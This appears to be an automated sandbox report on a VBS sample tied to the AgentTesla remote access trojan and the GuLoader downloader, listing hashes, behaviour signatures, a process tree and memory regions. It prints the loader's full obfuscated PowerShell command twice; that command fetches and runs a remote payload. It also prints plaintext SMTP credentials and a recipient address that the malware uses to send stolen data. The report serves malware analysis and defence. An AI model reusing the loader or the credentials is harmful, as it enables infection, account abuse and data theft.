Analysis

  • max time kernel
    152s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-03-2024 13:19

General

  • Target

    86bbab9cc5ca682eb3f04ba4978a9ecb9c2421d2218005cdc1125e9abd558bbc.vbs

  • Size

    41KB

  • MD5

    4969242177332816fc4fcd83a5180d28

  • SHA1

    cda9aab56c51225daa0a48c6ed43330f6a7f00a6

  • SHA256

    86bbab9cc5ca682eb3f04ba4978a9ecb9c2421d2218005cdc1125e9abd558bbc

  • SHA512

    bcbc618399502e0ceb7be462c07cb2e680dcaeebee1fb6c8642da9ca7d925048bead30b0a9b00151ebcc8630b0977e94134fa6ed0ed49c7cb5786820170fae42

  • SSDEEP

    768:u0mgBVHWAZGc8NnKwiQYppCxL4WoEnzu9DP:NhqNnKwSC/oUzu97

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.inkomech.com
  • Port:
    587
  • Username:
    amir.hussin@inkomech.com
  • Password:
    Amir@2021

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.inkomech.com
  • Port:
    587
  • Username:
    amir.hussin@inkomech.com
  • Password:
    Amir@2021
  • Email To:
    williamslucy570@gmail.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\86bbab9cc5ca682eb3f04ba4978a9ecb9c2421d2218005cdc1125e9abd558bbc.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cystometer Neals tyrannerne Appetiser Snderjydens Frocked #>;$Rondoens=(cmd /c set /A 115^^0);Function Unimaginatively ([String]$Aerifies){$Plenishes=[char][int]$Rondoens+'ubstring';$Darkle=8;$Udenomspladsers=Spyendes($Aerifies);For($Intervenerende=7; $Intervenerende -lt $Udenomspladsers; $Intervenerende+=$Darkle){$Rset=$Aerifies.$Plenishes.Invoke($Intervenerende, 1);$Bermmelige=$Bermmelige+$Rset;}$Bermmelige;}function Osteogangrene ($diasporaernes){. ($aaernes) ($diasporaernes);}function Spyendes ([String]$Lnproblems){$Promythic=$Lnproblems.Length-1;$Promythic;}$Sporedes=Unimaginatively ' ShieldTS,ocksprMisdde,a Semp.rnUdsondrsToppunkfImpetraeAerkedar ClavicrUnrepetiUnderstnReserveg.hermon ';$Udgiftsfres=Unimaginatively 'kl.dsenhTrompettfortaletDeplacepChancebsplanlgn:Indstud/eschato/RovenesdTebor er VareliiRousse,vFolkesteFrynses.Overwing lenarmoChronogo ReliqugReshufflHovedsye nsski.CyclospcTaliageo.eednesmOctobri/PowderluAntarctcFan tis?Photolue NonspexAction pBedstemo .ubdedr SilkehtPhrenic=Spl.cedd ClaspaoF.skeriw DeviernAi,rieclZonevisoDuctibiaScoliogdafbildn& OutstuiMechlindKultive=Kompone1Prefavo1ro,mandludvlgniODormm,s3Sta,dtijSoppedbeGurieks3Cogit,tzKaffebnIVareforPJacuarur Insert3Spali rAFlgenspcArrestu3EvakuerzRaadgi.6Skibski7,espotiU NdringeFunktiocSkovmrkD FjedsuF StyninxWristga5Velve lQBegir.s2cit.lesFSkarpskGMrkeli.pBero ndfkan evalAfhor e ';$aaernes=Unimaginatively 'Genea oi ivevenePlastvax pontop ';$legumin=Unimaginatively 'Sab tre$CoenantgBanalnelMindr.voUdflytbbDiskredaexplanalOverfri:AlkalieD Phrygaihtsstran RegnefnStreambiPtyalisnB,obookgAcclima Corpora=Frostsi ,odophtS.liseptt.rostboaObstetrrPseu optRevanch-Sympat BSkilllaiTrafikktEleuinpsFugeskeTPronater SykurvaDendritnHy.tegssBaan.spfFalbudteForjagerTrangsn Incircl-F.eudiaSBegoniaoMomskoduOverfarrBaldakicBlotlggeGastr,a Elektri$ SloebeUGlai.uldSyndsbegTilbageiKerberofNavngivt Skrives I.perff GovernrMartineeUnven issaxenma comput-Beduin DSvi gleeS,abrstsVinylentLagu.cuiundereanWhatretaHjredret PrintliChamaesoPrototynToggery S,mialu$PrivatiFEggberriStandsnrScabioueOppostiw.aarerso A.onner opularmWittuds ';Osteogangrene (Unimaginatively ' Aerobo$Lisieatg Trave,lBahutj oOutfighb Ravelpa Urtidel be,ewi: VestenFPhlo.otiExtricarUnna,igeBesyngewVietconoNormalfr olumnambik.ema=Noctamb$overdi,e capparnDimmit,vRamfeez: brekraaBadehaapSusannepPenta,edProvokea Gravstt PuhdinaOmklass ') ;Osteogangrene (Unimaginatively 'DekolleIBilinafmBandboxpUn,dergo onagenrPumpesstGeopol.-Bulter.MNeedle oForsikrdOve offuStereo,lMiseat.ePolitis G imrerBStudse iSammendt.ugernesB,nefdsTZonevisrArbej,saKortfrinToup kos AllegofFibrinoeTastaturInharmo ') ;$Fireworm=$Fireworm+'\Civilingenioeruddannelsen.Iso' ;Osteogangrene (Unimaginatively 'Trochle$ SwackggTegne ilWhoneheoPrecontbFiskefia Pr.sidlSemisen:Bourbo,SDifferekKasser,yYellowwtSmasheitSuffrageLekvarukFdselssd Indskre .aumetrAgterstsImporto=Byg.emo(StorrygT abirite Charl sSynchr.tEtablis-djvleudP N,nconaImplanttUdgangshFdselsd Creatio$PersoneFLoculikiGlycerorAndri teKritisawe,tersioCairbamrShinglemElmaale)Guestho ') ;while (-not $Skyttekders) {Osteogangrene (Unimaginatively 'Well osISulphocfAlkam.n Solarie(Termlyb$Horeh.sDPho.ochi Prest nUpclimbnNonoccui F,skemnFeins,hgTypolit.DandifiJSelskabo TauroebReceiptSgrigssktRegorgea Re.nsetEkse.ereAuto ox landeje- RdsteneSh ikhdqteorien Impropr$ InteroSfo sigtpMlstommoUklanderJ,ssicaenonpersd Scotche.eralpisAa,soms)Spanske Hamstri{Kons anSrunde itRec,rkuaShookssrTre,umst .laare-BetnksoSR famillLnoverfeKnokledeT akasspAppe di Untemp1Folklor}Preconye .ulpwolFattighsBhutanseTechniq{Int.rfaSTwel,emtFragikka LobbymrDomicelt emoler-TornsanSEnsilatlCestuiaeXenophoeTrica ip vejsh stillid1Nydanne;LavadelOSelamlisSeismset InkasseCskusinoDomsudsgoreophaaAitvaran FabledgInv ctir Waf skeRemsehynind,videStav,rk Unalms$Bal nceltranscoeTeutonigA.arteruEurasiemAdminisiLejevrdnLngdegr}Compute ');Osteogangrene (Unimaginatively ' Maria $StridorgOverdivlMinutvioG dspribAnt.parapartilslAngstkl:ClientrS Sentimk OpskreyAbel.ketIrmgardtLandinseSquibstkSunblindLovgivneVit.culrGads ilsFi,ende=bereths(SlusepoTSociusse B ombrsbambu,stVgskab.-PeriodiPGuttensaKloderntUnspotlhFornuft Tribual$repressFU,derbuiAlkalimrAbso,ute FabrikwSvmmeh,o opishr Ar,hflmforgaar) Laspey ') ;}Osteogangrene (Unimaginatively 'un.erpo$Skaaltag SuccinlBeautico Drateub AabnemaJoensscl Konver:Abodes K.ounteroPapulo nbelbsgrgKvabsosrMizz ine ,elrepsPsykosepForthpuaDetribalSesquihaSesbanvdTilmaalsShoppiee Te,tser Toothc3 ,eighb1 O.erel Appassi=Abstrus VoldgraG Th oneeSn.rrigtNo tang-PrecosmCKar linoPjk,eden uslimstFadecooeSelvangn,idebgetTubaist Hrvrksm$Rundry.F ortatiiRaygallrKlkketreErhvervwPreemino Dona.orReamsglmNickery ');Osteogangrene (Unimaginatively 'duckies$Stats lggooranulEquilu.oAeschynbLikeminaKal vrklChern v:ErnringT AfgiftaVillaenxAventreiNondefimGepid.eeLovformtDvekonseB.yantsrUdsagns Prokur= I,dfri Abesknt[FerritiSIndspily Au trasCerebrot Hurtlee wingstmGenopre.FuldtidCPr,aratoHierarcnC,nfiguvNomadiceNonfo srUnwil it Tattie]Lnindeh: idegad:Chig,taFQuilt.irJens.nloPositiomGelatinBHalsh gaSpa,dspsTrllemre Svrten6Taliped4DiffereS PotesttPusle.dr PilotfiFr.itlin NringsgRele at(Counter$alvorliK Wildl.o NavneenBe,iklegCarboxyrAlbuebeeSkibstisnono.sep BoflleaAtrophilRowdyisaPennsyldPelargosChartrieVa meisrAr,toce3 Biopla1Du.like)Annonce ');Osteogangrene (Unimaginatively ' Desser$ GuatemgMilligrlEv ngeloFaddersb celebrakartonnl etaphl: Sk,iveCTrffelsuFort,lkb ,utchibWils,niyBo,lleshAktiviso En,nciu Rommyespodargiestilige Meninti=U.lured anter[Forha,dSOmlbproy Lavt.nsProvoket Ind,oleFugt.ttm L,ftig.ForetraT TheromeUnregarxKlargoetResu,ds.interliE P.ptolnPetrosic Whatsho RecreadBoleworiMine,alnskrmprigBir fra]Granu,i: Fireta:ImpiercA,ermudaSXerophoCProno.nIStyrekoIAflytni. erhverGUnvoweleEnolizetSelvhj.SUngodl tTransfurPalmeriinationanMat chigTumbles(Prognos$bugser TOv.rglaa Krigerx St,kkeiAlleywamStyltereskri tetPaatalee Gitt,prKoussos) Strobo ');Osteogangrene (Unimaginatively 'Forsimp$Multi,rgFdmsvrtlSfor lao FrolicbUnsplenaLinka.elOverlbe: NydereASygesiksResurfabAnticeneJyllandsAktspaltBr stsvutangforssexolog=Sulphar$Ref,shiC Taktreufusionsb Net libLondon yOverconhH.mewauoSl ttetua othegsForegifeca,toko.K.ldeblsPressekuLashornb Ramni.sWeighmetTerrysxrcombingiAst,cionVersifigDisneyb(Glunch.3 Tra,sl4Siderea0Possies9benzina4Tenorfo2Wordlor, Foruda3Violone1Detailv7 syndet5Skrumpn5Unfinic)Forpagt ');Osteogangrene $Asbestus;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:1256
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Cystometer Neals tyrannerne Appetiser Snderjydens Frocked #>;$Rondoens=(cmd /c set /A 115^^0);Function Unimaginatively ([String]$Aerifies){$Plenishes=[char][int]$Rondoens+'ubstring';$Darkle=8;$Udenomspladsers=Spyendes($Aerifies);For($Intervenerende=7; $Intervenerende -lt $Udenomspladsers; $Intervenerende+=$Darkle){$Rset=$Aerifies.$Plenishes.Invoke($Intervenerende, 1);$Bermmelige=$Bermmelige+$Rset;}$Bermmelige;}function Osteogangrene ($diasporaernes){. ($aaernes) ($diasporaernes);}function Spyendes ([String]$Lnproblems){$Promythic=$Lnproblems.Length-1;$Promythic;}$Sporedes=Unimaginatively ' ShieldTS,ocksprMisdde,a Semp.rnUdsondrsToppunkfImpetraeAerkedar ClavicrUnrepetiUnderstnReserveg.hermon ';$Udgiftsfres=Unimaginatively 'kl.dsenhTrompettfortaletDeplacepChancebsplanlgn:Indstud/eschato/RovenesdTebor er VareliiRousse,vFolkesteFrynses.Overwing lenarmoChronogo ReliqugReshufflHovedsye nsski.CyclospcTaliageo.eednesmOctobri/PowderluAntarctcFan tis?Photolue NonspexAction pBedstemo .ubdedr SilkehtPhrenic=Spl.cedd ClaspaoF.skeriw DeviernAi,rieclZonevisoDuctibiaScoliogdafbildn& OutstuiMechlindKultive=Kompone1Prefavo1ro,mandludvlgniODormm,s3Sta,dtijSoppedbeGurieks3Cogit,tzKaffebnIVareforPJacuarur Insert3Spali rAFlgenspcArrestu3EvakuerzRaadgi.6Skibski7,espotiU NdringeFunktiocSkovmrkD FjedsuF StyninxWristga5Velve lQBegir.s2cit.lesFSkarpskGMrkeli.pBero ndfkan evalAfhor e ';$aaernes=Unimaginatively 'Genea oi ivevenePlastvax pontop ';$legumin=Unimaginatively 'Sab tre$CoenantgBanalnelMindr.voUdflytbbDiskredaexplanalOverfri:AlkalieD Phrygaihtsstran RegnefnStreambiPtyalisnB,obookgAcclima Corpora=Frostsi ,odophtS.liseptt.rostboaObstetrrPseu optRevanch-Sympat BSkilllaiTrafikktEleuinpsFugeskeTPronater SykurvaDendritnHy.tegssBaan.spfFalbudteForjagerTrangsn Incircl-F.eudiaSBegoniaoMomskoduOverfarrBaldakicBlotlggeGastr,a Elektri$ SloebeUGlai.uldSyndsbegTilbageiKerberofNavngivt Skrives I.perff GovernrMartineeUnven issaxenma comput-Beduin DSvi gleeS,abrstsVinylentLagu.cuiundereanWhatretaHjredret PrintliChamaesoPrototynToggery S,mialu$PrivatiFEggberriStandsnrScabioueOppostiw.aarerso A.onner opularmWittuds ';Osteogangrene (Unimaginatively ' Aerobo$Lisieatg Trave,lBahutj oOutfighb Ravelpa Urtidel be,ewi: VestenFPhlo.otiExtricarUnna,igeBesyngewVietconoNormalfr olumnambik.ema=Noctamb$overdi,e capparnDimmit,vRamfeez: brekraaBadehaapSusannepPenta,edProvokea Gravstt PuhdinaOmklass ') ;Osteogangrene (Unimaginatively 'DekolleIBilinafmBandboxpUn,dergo onagenrPumpesstGeopol.-Bulter.MNeedle oForsikrdOve offuStereo,lMiseat.ePolitis G imrerBStudse iSammendt.ugernesB,nefdsTZonevisrArbej,saKortfrinToup kos AllegofFibrinoeTastaturInharmo ') ;$Fireworm=$Fireworm+'\Civilingenioeruddannelsen.Iso' ;Osteogangrene (Unimaginatively 'Trochle$ SwackggTegne ilWhoneheoPrecontbFiskefia Pr.sidlSemisen:Bourbo,SDifferekKasser,yYellowwtSmasheitSuffrageLekvarukFdselssd Indskre .aumetrAgterstsImporto=Byg.emo(StorrygT abirite Charl sSynchr.tEtablis-djvleudP N,nconaImplanttUdgangshFdselsd Creatio$PersoneFLoculikiGlycerorAndri teKritisawe,tersioCairbamrShinglemElmaale)Guestho ') ;while (-not $Skyttekders) {Osteogangrene (Unimaginatively 'Well osISulphocfAlkam.n Solarie(Termlyb$Horeh.sDPho.ochi Prest nUpclimbnNonoccui F,skemnFeins,hgTypolit.DandifiJSelskabo TauroebReceiptSgrigssktRegorgea Re.nsetEkse.ereAuto ox landeje- RdsteneSh ikhdqteorien Impropr$ InteroSfo sigtpMlstommoUklanderJ,ssicaenonpersd Scotche.eralpisAa,soms)Spanske Hamstri{Kons anSrunde itRec,rkuaShookssrTre,umst .laare-BetnksoSR famillLnoverfeKnokledeT akasspAppe di Untemp1Folklor}Preconye .ulpwolFattighsBhutanseTechniq{Int.rfaSTwel,emtFragikka LobbymrDomicelt emoler-TornsanSEnsilatlCestuiaeXenophoeTrica ip vejsh stillid1Nydanne;LavadelOSelamlisSeismset InkasseCskusinoDomsudsgoreophaaAitvaran FabledgInv ctir Waf skeRemsehynind,videStav,rk Unalms$Bal nceltranscoeTeutonigA.arteruEurasiemAdminisiLejevrdnLngdegr}Compute ');Osteogangrene (Unimaginatively ' Maria $StridorgOverdivlMinutvioG dspribAnt.parapartilslAngstkl:ClientrS Sentimk OpskreyAbel.ketIrmgardtLandinseSquibstkSunblindLovgivneVit.culrGads ilsFi,ende=bereths(SlusepoTSociusse B ombrsbambu,stVgskab.-PeriodiPGuttensaKloderntUnspotlhFornuft Tribual$repressFU,derbuiAlkalimrAbso,ute FabrikwSvmmeh,o opishr Ar,hflmforgaar) Laspey ') ;}Osteogangrene (Unimaginatively 'un.erpo$Skaaltag SuccinlBeautico Drateub AabnemaJoensscl Konver:Abodes K.ounteroPapulo nbelbsgrgKvabsosrMizz ine ,elrepsPsykosepForthpuaDetribalSesquihaSesbanvdTilmaalsShoppiee Te,tser Toothc3 ,eighb1 O.erel Appassi=Abstrus VoldgraG Th oneeSn.rrigtNo tang-PrecosmCKar linoPjk,eden uslimstFadecooeSelvangn,idebgetTubaist Hrvrksm$Rundry.F ortatiiRaygallrKlkketreErhvervwPreemino Dona.orReamsglmNickery ');Osteogangrene (Unimaginatively 'duckies$Stats lggooranulEquilu.oAeschynbLikeminaKal vrklChern v:ErnringT AfgiftaVillaenxAventreiNondefimGepid.eeLovformtDvekonseB.yantsrUdsagns Prokur= I,dfri Abesknt[FerritiSIndspily Au trasCerebrot Hurtlee wingstmGenopre.FuldtidCPr,aratoHierarcnC,nfiguvNomadiceNonfo srUnwil it Tattie]Lnindeh: idegad:Chig,taFQuilt.irJens.nloPositiomGelatinBHalsh gaSpa,dspsTrllemre Svrten6Taliped4DiffereS PotesttPusle.dr PilotfiFr.itlin NringsgRele at(Counter$alvorliK Wildl.o NavneenBe,iklegCarboxyrAlbuebeeSkibstisnono.sep BoflleaAtrophilRowdyisaPennsyldPelargosChartrieVa meisrAr,toce3 Biopla1Du.like)Annonce ');Osteogangrene (Unimaginatively ' Desser$ GuatemgMilligrlEv ngeloFaddersb celebrakartonnl etaphl: Sk,iveCTrffelsuFort,lkb ,utchibWils,niyBo,lleshAktiviso En,nciu Rommyespodargiestilige Meninti=U.lured anter[Forha,dSOmlbproy Lavt.nsProvoket Ind,oleFugt.ttm L,ftig.ForetraT TheromeUnregarxKlargoetResu,ds.interliE P.ptolnPetrosic Whatsho RecreadBoleworiMine,alnskrmprigBir fra]Granu,i: Fireta:ImpiercA,ermudaSXerophoCProno.nIStyrekoIAflytni. erhverGUnvoweleEnolizetSelvhj.SUngodl tTransfurPalmeriinationanMat chigTumbles(Prognos$bugser TOv.rglaa Krigerx St,kkeiAlleywamStyltereskri tetPaatalee Gitt,prKoussos) Strobo ');Osteogangrene (Unimaginatively 'Forsimp$Multi,rgFdmsvrtlSfor lao FrolicbUnsplenaLinka.elOverlbe: NydereASygesiksResurfabAnticeneJyllandsAktspaltBr stsvutangforssexolog=Sulphar$Ref,shiC Taktreufusionsb Net libLondon yOverconhH.mewauoSl ttetua othegsForegifeca,toko.K.ldeblsPressekuLashornb Ramni.sWeighmetTerrysxrcombingiAst,cionVersifigDisneyb(Glunch.3 Tra,sl4Siderea0Possies9benzina4Tenorfo2Wordlor, Foruda3Violone1Detailv7 syndet5Skrumpn5Unfinic)Forpagt ');Osteogangrene $Asbestus;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2900
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:3128
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1796
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4056 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:2812

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Command and Control

        Web Service

        1
        T1102

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzdvrtoc.ho0.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1096-0-0x0000019AC2C40000-0x0000019AC2C62000-memory.dmp
          Filesize

          136KB

        • memory/1096-10-0x00007FFCE7F90000-0x00007FFCE8A51000-memory.dmp
          Filesize

          10.8MB

        • memory/1096-11-0x0000019AC0310000-0x0000019AC0320000-memory.dmp
          Filesize

          64KB

        • memory/1096-12-0x0000019AC0310000-0x0000019AC0320000-memory.dmp
          Filesize

          64KB

        • memory/1096-13-0x0000019AC3130000-0x0000019AC3156000-memory.dmp
          Filesize

          152KB

        • memory/1096-14-0x0000019AC3180000-0x0000019AC3194000-memory.dmp
          Filesize

          80KB

        • memory/1096-15-0x00007FFCE7F90000-0x00007FFCE8A51000-memory.dmp
          Filesize

          10.8MB

        • memory/1096-16-0x0000019AC0310000-0x0000019AC0320000-memory.dmp
          Filesize

          64KB

        • memory/1096-82-0x00007FFCE7F90000-0x00007FFCE8A51000-memory.dmp
          Filesize

          10.8MB

        • memory/1796-87-0x0000000074E80000-0x0000000075630000-memory.dmp
          Filesize

          7.7MB

        • memory/1796-79-0x00000000217A0000-0x00000000217B0000-memory.dmp
          Filesize

          64KB

        • memory/1796-57-0x0000000001E80000-0x0000000003548000-memory.dmp
          Filesize

          22.8MB

        • memory/1796-84-0x0000000021BA0000-0x0000000021C3C000-memory.dmp
          Filesize

          624KB

        • memory/1796-89-0x0000000021B80000-0x0000000021B8A000-memory.dmp
          Filesize

          40KB

        • memory/1796-83-0x0000000021AB0000-0x0000000021B00000-memory.dmp
          Filesize

          320KB

        • memory/1796-90-0x00000000217A0000-0x00000000217B0000-memory.dmp
          Filesize

          64KB

        • memory/1796-88-0x0000000022310000-0x00000000223A2000-memory.dmp
          Filesize

          584KB

        • memory/1796-77-0x0000000074E80000-0x0000000075630000-memory.dmp
          Filesize

          7.7MB

        • memory/1796-76-0x0000000000C20000-0x0000000000C62000-memory.dmp
          Filesize

          264KB

        • memory/1796-73-0x0000000000C20000-0x0000000001E74000-memory.dmp
          Filesize

          18.3MB

        • memory/1796-60-0x0000000001E80000-0x0000000003548000-memory.dmp
          Filesize

          22.8MB

        • memory/1796-59-0x00000000778A1000-0x00000000779C1000-memory.dmp
          Filesize

          1.1MB

        • memory/1796-58-0x0000000077928000-0x0000000077929000-memory.dmp
          Filesize

          4KB

        • memory/2900-22-0x0000000005840000-0x0000000005862000-memory.dmp
          Filesize

          136KB

        • memory/2900-41-0x00000000072D0000-0x0000000007366000-memory.dmp
          Filesize

          600KB

        • memory/2900-43-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-44-0x00000000084E0000-0x0000000008A84000-memory.dmp
          Filesize

          5.6MB

        • memory/2900-45-0x00000000074B0000-0x00000000074D2000-memory.dmp
          Filesize

          136KB

        • memory/2900-46-0x0000000007510000-0x0000000007524000-memory.dmp
          Filesize

          80KB

        • memory/2900-47-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-48-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-49-0x0000000007750000-0x0000000007751000-memory.dmp
          Filesize

          4KB

        • memory/2900-50-0x0000000008A90000-0x000000000A158000-memory.dmp
          Filesize

          22.8MB

        • memory/2900-51-0x0000000008A90000-0x000000000A158000-memory.dmp
          Filesize

          22.8MB

        • memory/2900-53-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-54-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-55-0x00000000778A1000-0x00000000779C1000-memory.dmp
          Filesize

          1.1MB

        • memory/2900-56-0x0000000008A90000-0x000000000A158000-memory.dmp
          Filesize

          22.8MB

        • memory/2900-42-0x0000000007260000-0x0000000007282000-memory.dmp
          Filesize

          136KB

        • memory/2900-40-0x0000000006610000-0x000000000662A000-memory.dmp
          Filesize

          104KB

        • memory/2900-39-0x00000000078B0000-0x0000000007F2A000-memory.dmp
          Filesize

          6.5MB

        • memory/2900-38-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-37-0x0000000074E80000-0x0000000075630000-memory.dmp
          Filesize

          7.7MB

        • memory/2900-75-0x0000000074E80000-0x0000000075630000-memory.dmp
          Filesize

          7.7MB

        • memory/2900-36-0x0000000006080000-0x00000000060CC000-memory.dmp
          Filesize

          304KB

        • memory/2900-35-0x0000000005FB0000-0x0000000005FCE000-memory.dmp
          Filesize

          120KB

        • memory/2900-78-0x0000000008A90000-0x000000000A158000-memory.dmp
          Filesize

          22.8MB

        • memory/2900-30-0x0000000005A00000-0x0000000005D54000-memory.dmp
          Filesize

          3.3MB

        • memory/2900-29-0x0000000005990000-0x00000000059F6000-memory.dmp
          Filesize

          408KB

        • memory/2900-23-0x0000000005920000-0x0000000005986000-memory.dmp
          Filesize

          408KB

        • memory/2900-21-0x0000000005110000-0x0000000005738000-memory.dmp
          Filesize

          6.2MB

        • memory/2900-20-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-19-0x0000000002680000-0x00000000026B6000-memory.dmp
          Filesize

          216KB

        • memory/2900-18-0x0000000002720000-0x0000000002730000-memory.dmp
          Filesize

          64KB

        • memory/2900-17-0x0000000074E80000-0x0000000075630000-memory.dmp
          Filesize

          7.7MB